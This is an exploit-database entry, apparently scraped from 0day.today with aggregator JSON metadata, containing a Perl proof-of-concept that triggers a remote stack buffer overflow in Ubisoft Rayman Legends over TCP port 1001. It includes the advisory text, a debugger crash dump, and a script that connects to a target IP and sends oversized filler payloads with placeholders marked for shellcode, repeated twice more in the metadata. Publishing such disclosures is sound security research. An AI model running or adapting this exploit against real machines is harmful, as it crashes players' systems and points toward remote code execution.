ID 1337DAY-ID-22343
Type zdt
Reporter LiquidWorm
Modified 2014-06-18T00:00:00
Description
Exploit for windows platform in category dos / poc
#!/usr/bin/perl
#
#
# Ubisoft Rayman Legends v1.2.103716 Remote Stack Buffer Overflow Vulnerability
#
#
# Vendor: Ubisoft Entertainment S.A.
# Product web page: http://www.ubi.com
# Affected version: 1.2.103716, 1.1.100477 and 1.0.95278
#
# Summary: Rayman Legends is a 2013 platform game developed by Ubisoft
# Montpellier and published by Ubisoft. It is the fifth main title in
# the Rayman series and the direct sequel to the 2011 game Rayman Origins.
# The game was released for Microsoft Windows, Xbox 360, PlayStation 3,
# Wii U, and PlayStation Vita platforms in August and September 2013.
# PlayStation 4 and Xbox One versions were released in February 2014.
#
# Desc: The vulnerability is caused due to a memset() boundary error in the
# processing of incoming data thru raw socket connections on TCP port 1001,
# which can be exploited to cause a stack based buffer overflow by sending a
# long string of bytes on the second connection. Successful exploitation could
# allow execution of arbitrary code on the affected node.
#
# ===========================================================================
#
# (15a8.f0c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=aaaaaaaa ebx=096494a0 ecx=10909090 edx=00000002 esi=1c1bde90 edi=00000000
# eip=715e26df esp=0f16dcec ebp=0f16dd14 iopl=0 nv up ei pl nz na pe cy
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010207
# MSVCR100!memset+0x5f:
# 715e26df f3ab rep stos dword ptr es:[edi]
# 0:028> d esp
# 0f16dcec 42 42 42 42 64 00 a6 00-00 00 00 00 aa 00 00 00 BBBBd...........
# 0f16dcfc 42 42 42 42 42 42 42 42-22 00 00 00 50 42 4b 1c BBBBBBBB"...PBK.
# 0f16dd0c 90 43 0f 08 01 00 00 00-28 dd 16 0f 04 02 a6 00 .C......(.......
# 0f16dd1c 50 42 4b 1c 6c dd 16 0f-d8 03 00 00 4c fd 16 0f PBK.l.......L...
# 0f16dd2c e3 f9 a5 00 48 dd 16 0f-fc 03 00 00 3c 1d f7 07 ....H.......<...
# 0f16dd3c 3c 1d f7 07 fb 14 db 75-fc 03 00 00 41 41 41 41 <......u....AAAA
# 0f16dd4c 41 41 41 41 41 41 41 41-41 41 41 41 42 42 42 42 AAAAAAAAAAAABBBB
# 0f16dd5c 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
#
# ===========================================================================
#
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN)
# Microsoft Windows 7 Ultimate SP1 (EN)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2014-5187
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5187.php
#
#
# 22.05.2014
#
#
use IO::Socket;
print
"
@****************************************@
| |
| Ubisoft Rayman Legends BoF PoC Script |
| |
| ZSL-2014-5187 |
| |
@****************************************@
";
$ip="$ARGV[0]";
if($#ARGV!=0)
{
print "\n\n\x20\x20\x1c\x20Usage: $0 <ipaddr>\n\n";
exit();
}
print "\n\x20\x1c\x20Target: $ip\n";
print "\x20\x1c\x20Initiating first connection\n";
sleep 2;
$conn1=IO::Socket::INET->new(PeerAddr=>$ip,PeerPort=>1001,Proto=>'tcp');
if(!$conn1)
{
print "\n\x20*** Connection error!\n";
exit();
} else
{
print "\x20\x1c\x20Connection established\n";
}
print $conn1 "\x44"x36;
print $conn1 "\x45\x45\x45\x45";
print $conn1 "\x46"x2000; # SC contain
print "\x20\x1c\x20Payload sent\n";
close $conn1;
print "\x20\x1c\x20First stage completed\n\x20\x1c\n";
print "\x20\x1c\x20Initiating second connection\n";
sleep 2;
$conn2=IO::Socket::INET->new(PeerAddr=>$ip,PeerPort=>1001,Proto=>'tcp');
if(!$conn2)
{
print "\n\x20*** Connection error!\n";
exit();
} else
{
print "\x20\x1c\x20Connection established\n";
}
print $conn2 "\x41" x 16;
print $conn2 "\x42\x42\x42\x42"; # ESP ->
print $conn2 "\x43"x1000; # SC contain
print "\x20\x1c\x20Payload sent\n";
print "\x20\x1c\x20Second stage completed\n";
close $conn2;
print "\x20\x1c\x20t00t!\n";
# 0day.today [2018-01-08] #
{"hash": "4a23900ecc57bb8f24b02288fd016ae6a2c88bd759f27878dbcb240dc3ab3565", "id": "1337DAY-ID-22343", "lastseen": "2018-01-09T01:01:13", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b0d3d3a91f21189719037cf41ad6dbfa", "key": "description"}, {"hash": "0974ae9708dd933050542a132316cbca", "key": "href"}, {"hash": "c8c42689a2d89b697041af5a50e0e6ce", "key": "modified"}, {"hash": "c8c42689a2d89b697041af5a50e0e6ce", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "91aad38014ecd6c9585176f5bacd2246", "key": "reporter"}, {"hash": "f69bef25a18792689bf26c0d1eb8fe18", "key": "sourceData"}, {"hash": "cb6054d0e339828abc6dad9faeb7aaad", "key": "sourceHref"}, {"hash": "6ffbf9a11185887948f8bf1dbf3d025a", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"vulnersScore": 7.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/22343", "description": "Exploit for windows platform in category dos / poc", "title": "Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow Vulnerability", "history": [{"bulletin": {"hash": "db8edb873fe23ad4ee0ae35cdf74cdd1db0e1d8e3c707c3e5200f6de1d2ab658", "id": "1337DAY-ID-22343", "lastseen": "2016-04-19T23:42:05", "enchantments": {"score": {"value": 5.5, "modified": "2016-04-19T23:42:05"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "74949bf9ad248c69b3e399e70c939064", "key": "sourceData"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d9cc47dfe438dabdfeb1e85e0bf11527", "key": "sourceHref"}, {"hash": "b0d3d3a91f21189719037cf41ad6dbfa", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "5f1d0caa504dcdd234957cc13a682097", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "91aad38014ecd6c9585176f5bacd2246", "key": "reporter"}, {"hash": "c8c42689a2d89b697041af5a50e0e6ce", "key": "published"}, {"hash": "c8c42689a2d89b697041af5a50e0e6ce", "key": "modified"}, {"hash": "6ffbf9a11185887948f8bf1dbf3d025a", "key": "title"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/22343", "description": "Exploit for windows platform in category dos / poc", "viewCount": 0, "title": "Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "#!/usr/bin/perl\r\n#\r\n#\r\n# Ubisoft Rayman Legends v1.2.103716 Remote Stack Buffer Overflow Vulnerability\r\n#\r\n#\r\n# Vendor: Ubisoft Entertainment S.A.\r\n# Product web page: http://www.ubi.com\r\n# Affected version: 1.2.103716, 1.1.100477 and 1.0.95278\r\n#\r\n# Summary: Rayman Legends is a 2013 platform game developed by Ubisoft\r\n# Montpellier and published by Ubisoft. It is the fifth main title in\r\n# the Rayman series and the direct sequel to the 2011 game Rayman Origins.\r\n# The game was released for Microsoft Windows, Xbox 360, PlayStation 3,\r\n# Wii U, and PlayStation Vita platforms in August and September 2013.\r\n# PlayStation 4 and Xbox One versions were released in February 2014.\r\n#\r\n# Desc: The vulnerability is caused due to a memset() boundary error in the\r\n# processing of incoming data thru raw socket connections on TCP port 1001,\r\n# which can be exploited to cause a stack based buffer overflow by sending a\r\n# long string of bytes on the second connection. Successful exploitation could\r\n# allow execution of arbitrary code on the affected node.\r\n#\r\n# ===========================================================================\r\n#\r\n# (15a8.f0c): Access violation - code c0000005 (first chance)\r\n# First chance exceptions are reported before any exception handling.\r\n# This exception may be expected and handled.\r\n# eax=aaaaaaaa ebx=096494a0 ecx=10909090 edx=00000002 esi=1c1bde90 edi=00000000\r\n# eip=715e26df esp=0f16dcec ebp=0f16dd14 iopl=0 nv up ei pl nz na pe cy\r\n# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010207\r\n# MSVCR100!memset+0x5f:\r\n# 715e26df f3ab rep stos dword ptr es:[edi]\r\n# 0:028> d esp\r\n# 0f16dcec 42 42 42 42 64 00 a6 00-00 00 00 00 aa 00 00 00 BBBBd...........\r\n# 0f16dcfc 42 42 42 42 42 42 42 42-22 00 00 00 50 42 4b 1c BBBBBBBB\"...PBK.\r\n# 0f16dd0c 90 43 0f 08 01 00 00 00-28 dd 16 0f 04 02 a6 00 .C......(.......\r\n# 0f16dd1c 50 42 4b 1c 6c dd 16 0f-d8 03 00 00 4c fd 16 0f PBK.l.......L...\r\n# 0f16dd2c e3 f9 a5 00 48 dd 16 0f-fc 03 00 00 3c 1d f7 07 ....H.......<...\r\n# 0f16dd3c 3c 1d f7 07 fb 14 db 75-fc 03 00 00 41 41 41 41 <......u....AAAA\r\n# 0f16dd4c 41 41 41 41 41 41 41 41-41 41 41 41 42 42 42 42 AAAAAAAAAAAABBBB\r\n# 0f16dd5c 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC\r\n#\r\n# ===========================================================================\r\n#\r\n#\r\n# Tested on: Microsoft Windows 7 Professional SP1 (EN)\r\n# Microsoft Windows 7 Ultimate SP1 (EN)\r\n#\r\n#\r\n# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n# @zeroscience\r\n#\r\n#\r\n# Advisory ID: ZSL-2014-5187\r\n# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5187.php\r\n#\r\n#\r\n# 22.05.2014\r\n#\r\n#\r\n \r\nuse IO::Socket;\r\n \r\nprint\r\n \"\r\n @****************************************@\r\n | |\r\n | Ubisoft Rayman Legends BoF PoC Script |\r\n | |\r\n | ZSL-2014-5187 |\r\n | |\r\n @****************************************@\r\n \";\r\n \r\n$ip=\"$ARGV[0]\";\r\n \r\nif($#ARGV!=0)\r\n{\r\n print \"\\n\\n\\x20\\x20\\x1c\\x20Usage: $0 <ipaddr>\\n\\n\";\r\n exit();\r\n}\r\n \r\nprint \"\\n\\x20\\x1c\\x20Target: $ip\\n\";\r\nprint \"\\x20\\x1c\\x20Initiating first connection\\n\";\r\n \r\nsleep 2;\r\n$conn1=IO::Socket::INET->new(PeerAddr=>$ip,PeerPort=>1001,Proto=>'tcp');\r\nif(!$conn1)\r\n{\r\n print \"\\n\\x20*** Connection error!\\n\";\r\n exit();\r\n} else\r\n {\r\n print \"\\x20\\x1c\\x20Connection established\\n\";\r\n }\r\n \r\nprint $conn1 \"\\x44\"x36;\r\nprint $conn1 \"\\x45\\x45\\x45\\x45\";\r\nprint $conn1 \"\\x46\"x2000; # SC contain\r\nprint \"\\x20\\x1c\\x20Payload sent\\n\";\r\nclose $conn1;\r\nprint \"\\x20\\x1c\\x20First stage completed\\n\\x20\\x1c\\n\";\r\nprint \"\\x20\\x1c\\x20Initiating second connection\\n\";\r\n \r\nsleep 2;\r\n$conn2=IO::Socket::INET->new(PeerAddr=>$ip,PeerPort=>1001,Proto=>'tcp');\r\nif(!$conn2)\r\n{\r\n print \"\\n\\x20*** Connection error!\\n\";\r\n exit();\r\n} else\r\n {\r\n print \"\\x20\\x1c\\x20Connection established\\n\";\r\n }\r\n \r\nprint $conn2 \"\\x41\" x 16;\r\nprint $conn2 \"\\x42\\x42\\x42\\x42\"; # ESP ->\r\nprint $conn2 \"\\x43\"x1000; # SC contain\r\nprint \"\\x20\\x1c\\x20Payload sent\\n\";\r\nprint \"\\x20\\x1c\\x20Second stage completed\\n\";\r\nclose $conn2;\r\nprint \"\\x20\\x1c\\x20t00t!\\n\";\n\n# 0day.today [2016-04-19] #", "published": "2014-06-18T00:00:00", "references": [], "reporter": "LiquidWorm", "modified": "2014-06-18T00:00:00", "href": "http://0day.today/exploit/description/22343"}, "lastseen": "2016-04-19T23:42:05", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "#!/usr/bin/perl\r\n#\r\n#\r\n# Ubisoft Rayman Legends v1.2.103716 Remote Stack Buffer Overflow Vulnerability\r\n#\r\n#\r\n# Vendor: Ubisoft Entertainment S.A.\r\n# Product web page: http://www.ubi.com\r\n# Affected version: 1.2.103716, 1.1.100477 and 1.0.95278\r\n#\r\n# Summary: Rayman Legends is a 2013 platform game developed by Ubisoft\r\n# Montpellier and published by Ubisoft. It is the fifth main title in\r\n# the Rayman series and the direct sequel to the 2011 game Rayman Origins.\r\n# The game was released for Microsoft Windows, Xbox 360, PlayStation 3,\r\n# Wii U, and PlayStation Vita platforms in August and September 2013.\r\n# PlayStation 4 and Xbox One versions were released in February 2014.\r\n#\r\n# Desc: The vulnerability is caused due to a memset() boundary error in the\r\n# processing of incoming data thru raw socket connections on TCP port 1001,\r\n# which can be exploited to cause a stack based buffer overflow by sending a\r\n# long string of bytes on the second connection. Successful exploitation could\r\n# allow execution of arbitrary code on the affected node.\r\n#\r\n# ===========================================================================\r\n#\r\n# (15a8.f0c): Access violation - code c0000005 (first chance)\r\n# First chance exceptions are reported before any exception handling.\r\n# This exception may be expected and handled.\r\n# eax=aaaaaaaa ebx=096494a0 ecx=10909090 edx=00000002 esi=1c1bde90 edi=00000000\r\n# eip=715e26df esp=0f16dcec ebp=0f16dd14 iopl=0 nv up ei pl nz na pe cy\r\n# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010207\r\n# MSVCR100!memset+0x5f:\r\n# 715e26df f3ab rep stos dword ptr es:[edi]\r\n# 0:028> d esp\r\n# 0f16dcec 42 42 42 42 64 00 a6 00-00 00 00 00 aa 00 00 00 BBBBd...........\r\n# 0f16dcfc 42 42 42 42 42 42 42 42-22 00 00 00 50 42 4b 1c BBBBBBBB\"...PBK.\r\n# 0f16dd0c 90 43 0f 08 01 00 00 00-28 dd 16 0f 04 02 a6 00 .C......(.......\r\n# 0f16dd1c 50 42 4b 1c 6c dd 16 0f-d8 03 00 00 4c fd 16 0f PBK.l.......L...\r\n# 0f16dd2c e3 f9 a5 00 48 dd 16 0f-fc 03 00 00 3c 1d f7 07 ....H.......<...\r\n# 0f16dd3c 3c 1d f7 07 fb 14 db 75-fc 03 00 00 41 41 41 41 <......u....AAAA\r\n# 0f16dd4c 41 41 41 41 41 41 41 41-41 41 41 41 42 42 42 42 AAAAAAAAAAAABBBB\r\n# 0f16dd5c 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC\r\n#\r\n# ===========================================================================\r\n#\r\n#\r\n# Tested on: Microsoft Windows 7 Professional SP1 (EN)\r\n# Microsoft Windows 7 Ultimate SP1 (EN)\r\n#\r\n#\r\n# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n# @zeroscience\r\n#\r\n#\r\n# Advisory ID: ZSL-2014-5187\r\n# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5187.php\r\n#\r\n#\r\n# 22.05.2014\r\n#\r\n#\r\n \r\nuse IO::Socket;\r\n \r\nprint\r\n \"\r\n @****************************************@\r\n | |\r\n | Ubisoft Rayman Legends BoF PoC Script |\r\n | |\r\n | ZSL-2014-5187 |\r\n | |\r\n @****************************************@\r\n \";\r\n \r\n$ip=\"$ARGV[0]\";\r\n \r\nif($#ARGV!=0)\r\n{\r\n print \"\\n\\n\\x20\\x20\\x1c\\x20Usage: $0 <ipaddr>\\n\\n\";\r\n exit();\r\n}\r\n \r\nprint \"\\n\\x20\\x1c\\x20Target: $ip\\n\";\r\nprint \"\\x20\\x1c\\x20Initiating first connection\\n\";\r\n \r\nsleep 2;\r\n$conn1=IO::Socket::INET->new(PeerAddr=>$ip,PeerPort=>1001,Proto=>'tcp');\r\nif(!$conn1)\r\n{\r\n print \"\\n\\x20*** Connection error!\\n\";\r\n exit();\r\n} else\r\n {\r\n print \"\\x20\\x1c\\x20Connection established\\n\";\r\n }\r\n \r\nprint $conn1 \"\\x44\"x36;\r\nprint $conn1 \"\\x45\\x45\\x45\\x45\";\r\nprint $conn1 \"\\x46\"x2000; # SC contain\r\nprint \"\\x20\\x1c\\x20Payload sent\\n\";\r\nclose $conn1;\r\nprint \"\\x20\\x1c\\x20First stage completed\\n\\x20\\x1c\\n\";\r\nprint \"\\x20\\x1c\\x20Initiating second connection\\n\";\r\n \r\nsleep 2;\r\n$conn2=IO::Socket::INET->new(PeerAddr=>$ip,PeerPort=>1001,Proto=>'tcp');\r\nif(!$conn2)\r\n{\r\n print \"\\n\\x20*** Connection error!\\n\";\r\n exit();\r\n} else\r\n {\r\n print \"\\x20\\x1c\\x20Connection established\\n\";\r\n }\r\n \r\nprint $conn2 \"\\x41\" x 16;\r\nprint $conn2 \"\\x42\\x42\\x42\\x42\"; # ESP ->\r\nprint $conn2 \"\\x43\"x1000; # SC contain\r\nprint \"\\x20\\x1c\\x20Payload sent\\n\";\r\nprint \"\\x20\\x1c\\x20Second stage completed\\n\";\r\nclose $conn2;\r\nprint \"\\x20\\x1c\\x20t00t!\\n\";\n\n# 0day.today [2018-01-08] #", "published": "2014-06-18T00:00:00", "references": [], "reporter": "LiquidWorm", "modified": "2014-06-18T00:00:00", "href": "https://0day.today/exploit/description/22343"}
{"result": {}}
